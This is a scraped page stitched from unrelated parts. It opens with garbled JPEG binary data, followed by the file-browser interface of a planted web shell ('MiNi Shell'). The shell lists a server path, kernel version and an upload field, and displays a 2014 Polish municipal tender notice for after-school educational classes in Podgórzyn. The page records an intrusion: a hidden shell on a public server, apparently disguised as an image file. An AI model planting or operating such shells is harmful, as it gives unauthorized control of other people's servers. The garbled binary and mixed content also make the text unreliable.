JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140804/259464-N-2014.html

<p class="kh_header"><b>Podgórzyn: Prowadzenie zajęć edukacyjnych w ramach projektu pn. Nowoczesna edukacja na wsi</b><br>
<b>Numer ogłoszenia: 259464 - 2014; data zamieszczenia: 04.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Podgórzyn , ul. Żołnierska 14, 58-562 Podgórzyn, woj. dolnośląskie, tel. 075 7621093, faks 075 7621358.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.podgorzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć edukacyjnych w ramach projektu pn. Nowoczesna edukacja na wsi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
Zamówienie obejmuje przeprowadzenie zajęć edukacyjnych w ramach projektu Nowoczesna edukacja na wsi  realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. 
Zajęcia edukacyjne będą realizowane dla uczniów szkół : 
I.Zajęcia edukacyjne dla uczniów Zespołu Szkolno-Przedszkolnym w Miłkowie w okresie wrzesień   2014r. - czerwiec  2015 r. : 
1. Młodzi poligloci - zajęcia z języka angielskiego dla 16 uczniów (2 grupy), łącznie maksymalnie do 192 godzin lekcyjnych; 2. Warsztaty matematyczno-przyrodnicze dla 16 uczniów (2 grupy), łącznie  maksymalnie do 192 godzin lekcyjnych; 3. Zajęcia naukowo-techniczne dla 16 uczniów (2 grupy), łącznie maksymalnie 168 godzin lekcyjnych; 4. Zajęcia w laboratorium przyrodniczym dla 4 uczniów (1 grupa), 12 spotkań, łącznie maksymalnie 24 godzin lekcyjnych; II.Zajęcia edukacyjne dla uczniów Szkoły Podstawowej w Sosnówce  w okresie wrzesień 2014r. -czerwiec 2015 r. : 1.Młodzi poligloci - zajęcia z języka angielskiego dla 16 uczniów (2 grupy), łącznie maksymalnie do 192 godzin lekcyjnych; 2.Warsztaty matematyczno-przyrodnicze dla 16 uczniów (2 grupy), łącznie  maksymalnie do 192 godzin lekcyjnych; 3.Zajęcia naukowo-techniczne dla 16 uczniów (2 grupy), łącznie maksymalnie 168 godzin lekcyjnych; 4.Zajęcia w laboratorium przyrodniczym dla 4 uczniów (1 grupa), 12 spotkań, łącznie maksymalnie 24 godzin lekcyjnych; 5.zajęcia na basenie dla 30 osób (2 grupy), 24 wyjazdy na basen po 2 godz. lekcyjne, maksymalnie do 48 godzin lekcyjnych; III.Zajęcia edukacyjne dla uczniów Szkoły Podstawowej w Ścięgnach w okresie wrzesień  2014r. -czerwiec  2015 r. : 
1.Młodzi poligloci  - zajęcia z języka angielskiego dla 16 uczniów (2 grupy), łącznie maksymalnie do 192 godzin lekcyjnych; 2.Warsztaty matematyczno-przyrodnicze dla 18 uczniów (2 grupy), łącznie  maksymalnie do 192 godzin lekcyjnych; 3.Zajęcia naukowo-techniczne dla 16 uczniów (2 grupy), łącznie maksymalnie 168 godzin lekcyjnych; 4.Zajęcia w laboratorium przyrodniczym dla 4 uczniów (1 grupa), 12 spotkań, łącznie maksymalnie 24 godzin lekcyjnych; IV. Zajęcia edukacyjne dla uczniów Gimnazjum Gminnym w Sosnówce w okresie wrzesień  2014r. -czerwiec 2015 r.: 1. Młodzi poligloci - zajęcia z języka angielskiego dla 16 uczniów (2 grupy), łącznie maksymalnie do 192 godzin lekcyjnych; 2.Młodzi poligloci  - zajęcia z języka niemieckiego dla 16 uczniów (2 grupy), łącznie maksymalnie do 192 godzin lekcyjnych; 3.Warsztaty matematyczno-przyrodnicze dla 8 uczniów (1 grupy), łącznie  maksymalnie do 128 godzin lekcyjnych; 4.Zajęcia naukowo-techniczne dla 16 uczniów (2 grupy), łącznie maksymalnie 104 godzin lekcyjnych; 5.Zajęcia w laboratorium przyrodniczym dla 4 uczniów (1 grupa), 12 spotkań, łącznie maksymalnie 24  godzin lekcyjnych; V.Opracowanie i wdrożenie indywidualnych programów rozwojowych dla 40 uczniów szkół podstawowych  w Sosnówce , Miłkowie, Ścięgnach i w Gimnazjum w Sosnówce łącznie maksymalnie do 240 godzin lekcyjnych.
Możliwe jest prowadzenie zajęć z mniejszą liczba uczestników  w przypadku przyczyn niezależnych od Zamawiającego, których nie można  było przewidzieć tj. np.  długotrwała choroba , rezygnacja itp.
Podana ilość godzin zajęć edukacyjnych jest wielkością maksymalną.  
Szczegółowe wymagania Zamawiającego dotyczących prowadzenia zajęć edukacyjnych:  a.zajęcia muszą być prowadzone zgodnie ze wskazanym dla danej grupy charakterem, jako zajęcia rozwijające, przy uwzględnieniu wieku grup uczestników zajęć; zajęcia rozwijające mają na celu zdobycie przez uczniów wiedzy i umiejętności wykraczających ponad program nauczania danego przedmiotu obowiązujący dla poszczególnych klas oraz rozwinięcie zainteresowań w nauce przedmiotów ścisłych i językowych oraz pozyskanie nowych umiejętności;  b.zajęcia muszą być prowadzono przy wykorzystaniu nowoczesnych metod nauczania; za nowoczesne metody nauczania będzie uznane co najmniej nauczanie przy wykorzystaniu : - oprogramowań komputerowych do nauki matematyki, geometrii, języków obcych, przyrody, fizyki; - prezentacji graficznych multimedialnych w nauczaniu :  matematyki i techniki do poznania funkcji liniowej, trygonometrycznej, planimetrii, zbiorów itp. oraz fizyki i techniki do prezentacji ćwiczeń z: dynamiki, statyki,  termodynamiki, elektryczności, magnetyzmu i emisji elektronów itp.;
-  przyrządów i pomocy naukowych do nauki fizyki, techniki i matematyki, przyrodniczych (między innymi bryły geometryczne, lunety, soczewki, spektroskop, dynamometr, mierniki, fantomów, modeli anatomicznych, itp.);
- gier komputerowych lub symulacyjnych do nauczania matematyki i fizyki; 
- kostki Rubika, klocków Lego lub innych narzędzi o podobnym zastosowaniu do nauczania matematyki, fizyki i techniki; - pracowni przyrodniczej do nauki przyrody, fizyki i  techniki; - telewizyjnych programów edukacyjnych do nauki matematyki, przyrody, fizyki, techniki; - metod e- learningowych do zajęć językowych, metody SITA, itp.; c.indywidualne programy rozwojowe muszą być sporządzone przy wykorzystaniu co najmniej takich jak narzędzia stosowane w coachingu, techniki TOC (Theory of Constuints for Education), itp.;
d.indywidualne programy rozwojowe muszą uwzględniać zagadnienia :
- w zakresie skuteczności działań: naukę projektowania, planowania, realizacji i ewaluacji; - w zakresie przywództwa: naukę samodzielności i samodyscypliny;
- w zakresie wartości: kształtowanie stosunku do dobra, piękna, godności i solidarności  społecznej ; - w zakresie postaw: kształtowanie postaw życzliwości, empatii, otwartości, odwagi, szczerości; - w zakresie kompetencji społecznych: naukę wypowiadania się, przemawiania, obrony własnych opinii, nauka pracy zespołowej; e. zajęcia muszą odbywać się przy wykorzystaniu nowoczesnych metod nauczania,  przy czym udział czasu przeznaczonego na prowadzenie zajęć przy wykorzystaniu nowoczesnych metod nauczania nie może być mniejszy niż 80 %; d. pomieszczenia do prowadzenia zajęć muszą być wyposażone w co najmniej sprzęt i wyposażenie wymagane do prowadzenia zajęć w publicznych placówkach oświatowych przewidzianych dla uczniów szkół podstawowych i gimnazjalnych. Pomieszczenia własne i/lub najmowane muszą być wyposażone w sprzęt i pomoce dydaktyczne (wymagane jest złożenie oświadczenia o prawie do dysponowania tymi pomieszczeniami). W przypadku realizowania zajęć edukacyjnych poza miejscowościami, w których uczniowie realizują obowiązek szkolny Wykonawca zobowiązany jest zorganizować na swój koszt transport uczestników w dwie strony (na zajęcia i z powrotem) z opiekunem podczas transportu (warunek ten nie dotyczy zajęć w laboratorium przyrodniczym i zajęć na pływalni);  e.zajęcia w laboratorium przyrodniczym w Podgórzynie mogą być prowadzone wyłącznie przez osoby posiadające przeszkolenie uprawniające do prowadzenia zajęć w tej pracowni; f.w przypadku wykorzystania laboratorium przyrodniczego będącego w dyspozycji Zamawiającego  wymagane jest jego wyposażenie w co najmniej: mikroskopy, zestawy do badań wody, gleby, lupy, tablicę interaktywną stanowiska komputerowe z oprogramowaniem, wizualizery, kompasy, menzurki, odczynniki chemiczne; g.zajęcia nauki pływania muszą być prowadzone na krytym basenie o długości toru w linii prostej co najmniej  20 metrów. Wymagane jest aby zajęcia były prowadzone na wyodrębnionym od innych torów pływackich. Wykonawca zabezpiecza w ramach ceny za prowadzenie zajęć zabezpiecza tzw. wejściówki dla całej grupy. Lokalizacja krytego basenu musi być w odległości nie większej niż 15 km. od siedziby Zamawiającego; h.Wykonawca zapewnia na czas zajęć sprzęt i pomoce dydaktyczne, które są niezbędne do przeprowadzenia zajęć; i.zajęcia muszą być prowadzone zgodnie ze szczegółowymi wymaganiami Zamawiającego oraz zasadami bezpieczeństwa i higieny pracy;  j.Wykonawca zobowiązany jest do sprawowania opieki nad uczestnikami zajęć w czasie ich prowadzenia oraz podczas przerw; k.prowadzący zajęcia prowadzi dokumentację z przebiegu zajęć wg wzoru określonego przez Zamawiającego, dokumenty te przekazywane są do Biura Projektu niezwłocznie po upływie każdego miesiąca prowadzenia zajęć; l.zapewnienia należytą  ochronę danych osobowych uczestników zajęć zgodnie z obowiązującymi przepisami prawa ; m.Wykonawca zobowiązany jest do: -niezwłocznego poinformowania Zamawiającego o nie zgłoszeniu się któregokolwiek uczestnika na zajęcia, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacji, które mają wpływ na realizację programu zajęć i umowy, -informowania uczestników zajęć, iż są one współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, -oznakowania pomieszczeń (sal), w których jest realizowany projekt oraz dokumentacji zajęć (listy obecności, harmonogram zajęć, zaświadczenia, dziennik zajęć) zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013 i uwagami Zamawiającego (stosowania logotypów Unii Europejskiej, Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki,  -współpracy z Zamawiającym przy promocji oraz monitorowaniu działań związanych z zajęciami (ankiety ewaluacyjne, niezbędne zestawienia lub sprawozdania z przebiegu), -dbałości o sprzęt i urządzenia przekazane przez Zamawiającego wykorzystywane w trakcie realizacji projektu, -w przypadku korzystania z pomieszczeń szkół - współdziałania z dyrektorem szkoły, w której odbywają się zajęcia w zakresie harmonogramu zajęć, naboru uczniów na zajęcia oraz wszelkich spraw mających wpływ na rytm pracy szkoły;  n.przez godzinę zajęć  rozumie się 45 minut;o. Wykonawca zobowiązany jest  przed podpisaniem umowy do przedłożenia Zamawiającemu  zgodnie z wymaganiami  punktu. 3.1. SIWZ.
Zamawiający zastrzega sobie aby :- zajęcia  odbywały się w dni powszednie a także w miarę możliwości w soboty. Termin zajęć winny być  dostosowane  do rytmu pracy szkoły do której uczęszczają  uczestnicy (dostępność sal lekcyjnych, inne uwarunkowania, np. dojazdy uczniów do i ze szkół)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się minimalnych standardów, zamawiający dokona oceny spełniania tego warunku na podstawie oświadczenia o spełnianiu warunków udziału w postepowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia  mogą się ubiegać Wykonawcy, którzy wykażą , że wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną usługę  o zakresie i charakterze porównywalnym z niniejszym zamówieniem, tzn. prowadzili  zajęcia edukacyjne z uczniami szkół podstawowych i gimnazjalnych  zostały wykonane w sposób należyty i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) wymagane jest przedłożenie oświadczenia o prawie do dysponowania pomieszczeniami do przeprowadzenia zajęć  oraz 
b) potwierdzenie dysponowania co najmniej : 
1. do zajęć matematyczno -przyrodniczych: oprogramowaniem komputerowym do nauczania matematyki i przyrody lub przyrządami i pomocami naukowymi (takimi co najmniej jak: bryły geometryczne, lunety, soczewki, spektroskop, dynamometr, mierniki, fantomy, modele anatomiczne) lub grami komputerowymi do nauki matematyki i przyrody lub klockami Lego lub innymi narzędziami o podobnym zastosowaniu do nauki matematyki i fizyki lub telewizyjnymi programami edukacyjnymi do nauki matematyki i przyrody 2. do zajęć naukowo-technicznych: oprogramowaniem komputerowym do nauczania techniki, fizyki lub przyrządami i pomocami naukowymi (takimi co najmniej jak: bryły geometryczne, lunety, soczewki, spektroskop, dynamometr, mierniki, fantomy, modele anatomiczne) lub grami komputerowymi do nauczania techniki i fizyki lub klockami Lego lub innymi narzędziami o podobnym zastosowaniu do nauczania techniki i fizyki lub telewizyjnymi programami edukacyjnymi do nauczania techniki i fizyki 3. do zajęć językowych:  zestawami komputerowymi dla każdego uczestnika zajęć językowych w grupie 4. do zajęć w laboratorium przyrodniczym będącym w dyspozycji Wykonawcy: mikroskopami, zestawami do badań wody, gleby, lupami, tablicami interaktywnymi, stanowiskami komputerowymi z oprogramowaniem, wizualizeremi, kompasami, menzurkami, odczynnikami chemicznymi;  -  przy realizacji usługi edukacyjnej w laboratorium przyrodniczym w Podgórzynie wymagane jest złożenie oświadczenia o odbytym przeszkoleniu; 5. do zajęć na basenie: wymagane jest złożenie oświadczenia o prawie do wykonywania usługi na krytym basenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami posiadającymi wykształcenie i kwalifikacje zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r. Nr 50, poz. 400 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się minimalnych standardów, zamawiający dokona oceny spełniania tego warunku na podstawie oświadczenia o spełnianiu warunków udziału w postepowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.podgorzyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Podgórzyn ul. Żołnierska 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2014 godzina 09:30, miejsce: ul. Żołnierska 14, 58-562 Podgórzyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest finansowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com